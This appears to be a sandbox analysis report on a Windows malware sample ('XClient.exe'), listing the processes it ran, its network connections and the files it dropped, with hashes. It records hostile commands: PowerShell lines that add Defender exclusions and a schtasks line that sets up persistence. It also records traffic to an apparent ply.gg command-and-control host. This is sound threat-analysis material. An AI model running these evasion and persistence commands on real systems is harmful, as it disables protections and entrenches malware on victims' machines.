"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{49e990c2-b96a-4efd-b3e4-8c68b74f26ba}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:ShellFeedsUI.AppXnj65k2d1a1rnztt2t2nng5ctmk3e76pn.mca

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{7966B4D8-4FDC-4126-A10B-39A3209AD251}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

C:\Users\Admin\AppData\Roaming\XClient.exe

C:\Users\Admin\AppData\Roaming\XClient.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 138.201.86.20.in-addr.arpa udp
US 8.8.8.8:53 gstatic.com udp
GB 142.250.200.3:443 gstatic.com tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 162.159.128.233:443 discord.com tcp
US 8.8.8.8:53 233.128.159.162.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply.gg udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 20.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
US 8.8.8.8:53 100.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
US 147.185.221.20:49403 quotes-suites.gl.at.ply.gg tcp
N/A 127.0.0.1:49403 tcp
US 8.8.8.8:53 quotes-suites.gl.at.ply udp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp
N/A 127.0.0.1:49403 tcp

Files

memory/3604-0-0x00007FFE83F43000-0x00007FFE83F45000-memory.dmp

memory/3604-1-0x00000000009C0000-0x0000000000A0A000-memory.dmp

memory/3604-4-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe

MD5 737b2d60dc5d475685b65f5c288e00c0
SHA1 144ba7647d8609abe4aab74d4f191e2c594dd55a
SHA256 69c3458a319518d10939633f7421eb833c8c9c904f989f0ef75a572a59a1f084
SHA512 96a22774e1b5c22d9d4114a8f22f1f75cf2edc5970442e1b1e5eabfc70a922d3f4a5e5d8c93150f50ef3da45b241745f861f1d00b306c11707097495b84ecee6

C:\Users\Admin\AppData\Local\Temp\Modify.exe

MD5 9259d8aef8f52e8ff4fa082c0074c9b0
SHA1 88abb68a5632812be3c18e0c740e3818d9501b3e
SHA256 45d4033eeaa6aa420a644c3eb2d0ef659320c9a13e22d1d16930c807847203db
SHA512 9cb06d4026a53208e80865cdb21d79e40d418518a168680537cafa08f1c295094238014ba35c2b7794a773ac2dc480b01cf5811d5b1e60bf911d7a6d03985ede

memory/2808-26-0x0000000000200000-0x0000000000210000-memory.dmp

memory/2808-24-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/4260-29-0x0000027353160000-0x00000273531A0000-memory.dmp

memory/4260-30-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/972-36-0x000001BFC8560000-0x000001BFC8582000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5uioafcs.iy2.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2979eabc783eaca50de7be23dd4eafcf
SHA1 d709ce5f3a06b7958a67e20870bfd95b83cad2ea
SHA256 006cca90e78fbb571532a83082ac6712721a34ea4b21f490058ffb3f521f4903
SHA512 92bc433990572d9427d0c93eef9bd1cc23fa00ed60dd0c9c983d87d3421e02ce3f156c6f88fe916ef6782dbf185cbce083bc0094f8c527f302be6a37d1c53aba

C:\ProgramData\www.DeadSec0000000000-obfusecator.exe

MD5 22d120454dd38d7f1a3f1cd0eb497f95
SHA1 4c11a082bf8e64b21310b959821a9f7324aa8107
SHA256 6fda5bd63e6647c70c7f420b4145898cada9e1a8bff4fca7f6a5859b648d217c
SHA512 1552101b7a22082eb69fe3485c53f595055bfc6db01ed14d4abc6f9cb9793e8ca3bc2f2448741fd8b4616f735c9f4f2e0299dc938d264103107fccbe68dc39a9

memory/3604-63-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 10890cda4b6eab618e926c4118ab0647
SHA1 1e1d63b73a0e6c7575f458b3c7917a9ce5ba776d
SHA256 00f8a035324d39bd62e6dee5e1b480069015471c487ebee4479e6990ea9ddb14
SHA512 a2ee84006c24a36f25e0bca0772430d64e3791f233da916aecdeae6712763e77d55bbbd00dc8f6b2b3887f3c26ab3980b96c5f46cc823e81e28abbbc5fc78221

memory/4260-78-0x000002736D8C0000-0x000002736D936000-memory.dmp

memory/4260-79-0x0000027354F60000-0x0000027354FB0000-memory.dmp

memory/4260-80-0x000002736D940000-0x000002736D95E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 07d142044fb78e359c794180a9c6fdff
SHA1 8a7155f93a53ff1b7f382a4ccb3f58ff2f88808e
SHA256 2af8c3ca529953085ca25f69d9142964e2ce5508665c14f3533a47d254fed3ea
SHA512 356edd3598c09b765c3de325bc47c5c8ae7fcfd87e8c58e12e8bb6437f1d7ce58310e06c4d64336815833e280f2e61c288edb09508c4f29876d28b0d602aeb78

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d3235ed022a42ec4338123ab87144afa
SHA1 5058608bc0deb720a585a2304a8f7cf63a50a315
SHA256 10663f5a1cb0afe5578f61ebaae2aafb363544e47b48521f9c23be9e6e431b27
SHA512 236761b7c68feca8bd62cba90cff0b25fac5613837aaa5d29ae823ace8b06a2057553cf7e72b11ccc59b6c289e471ca1bbac1a880aef5e2868875371a17c1abf

memory/2808-123-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/4260-126-0x000002736D960000-0x000002736D96A000-memory.dmp

memory/4260-127-0x000002736D9B0000-0x000002736D9C2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d335b933fd5902cc5d6e6f5cfae33b57
SHA1 30511e75e9f4d4b09ddbeb2b6adeb5cd89defd87
SHA256 c1e38b772837438d10218009be55d7b2098daa5ba708708836f56a7e99024dc1
SHA512 4839b6be9877bb1a64d387df0f93b40859e48a5b6e7d2fb5fd92a057b1973916b93727b4dca9f1819038da65fd4548afb7f0c414a82e388e714dde6e6ccb4266

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a0c0a8d1f8f450b3623a60721b4eb28
SHA1 462bf53afba0d96f3c5a528e8a5f9e3d40083b24
SHA256 e81c53eaaee036b0a54daf828e5268973ff71477c84f9248ed904f4d6cd92902
SHA512 82848da2dc54602d048958819b5083582cecee502f33656706e708c168a0abc854e1e9b57865e754f41d678ec662ac681ef61b4dfd8ca255f48bc9bc1aeea818

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 15dde0683cd1ca19785d7262f554ba93
SHA1 d039c577e438546d10ac64837b05da480d06bf69
SHA256 d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961
SHA512 57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 ce4540390cc4841c8973eb5a3e9f4f7d
SHA1 2293f30a6f4c9538bc5b06606c10a50ab4ecef8e
SHA256 e834e1da338b9644d538cefd70176768816da2556939c1255d386931bd085105
SHA512 2a3e466cb5a81d2b65256053b768a98321eb3e65ff46353eefc9864f14a391748116f050e7482ddd73a51575bf0a6fc5c673023dade62dbd8b174442bae1cc6b

memory/3688-185-0x0000019248380000-0x00000192483AA000-memory.dmp

memory/3688-186-0x00007FFEA2150000-0x00007FFEA2345000-memory.dmp

memory/3688-188-0x00007FFEA0940000-0x00007FFEA09FE000-memory.dmp

memory/3652-192-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3652-191-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3652-194-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3652-196-0x00007FFEA0940000-0x00007FFEA09FE000-memory.dmp

memory/3652-195-0x00007FFEA2150000-0x00007FFEA2345000-memory.dmp

memory/3652-190-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3652-189-0x0000000140000000-0x0000000140008000-memory.dmp

memory/616-200-0x000001AC34140000-0x000001AC34166000-memory.dmp

memory/672-220-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

memory/952-231-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

memory/64-242-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

memory/736-246-0x000001FB60540000-0x000001FB6056C000-memory.dmp

memory/64-241-0x0000012258B60000-0x0000012258B8C000-memory.dmp

memory/64-235-0x0000012258B60000-0x0000012258B8C000-memory.dmp

memory/952-230-0x00000218B1F00000-0x00000218B1F2C000-memory.dmp

memory/952-224-0x00000218B1F00000-0x00000218B1F2C000-memory.dmp

memory/672-219-0x000001E58DB30000-0x000001E58DB5C000-memory.dmp

memory/672-213-0x000001E58DB30000-0x000001E58DB5C000-memory.dmp

memory/616-209-0x00007FFE621D0000-0x00007FFE621E0000-memory.dmp

memory/616-208-0x000001AC34170000-0x000001AC3419C000-memory.dmp

memory/616-202-0x000001AC34170000-0x000001AC3419C000-memory.dmp

memory/616-201-0x000001AC34170000-0x000001AC3419C000-memory.dmp

memory/3652-197-0x0000000140000000-0x0000000140008000-memory.dmp

memory/4260-836-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/2808-914-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/2808-918-0x00007FFE83F40000-0x00007FFE84A01000-memory.dmp

memory/3612-1014-0x0000000000560000-0x0000000000570000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XClient.exe.log

MD5 2ff39f6c7249774be85fd60a8f9a245e
SHA1 684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256 e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA512 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

memory/1700-1128-0x0000000000310000-0x0000000000320000-memory.dmp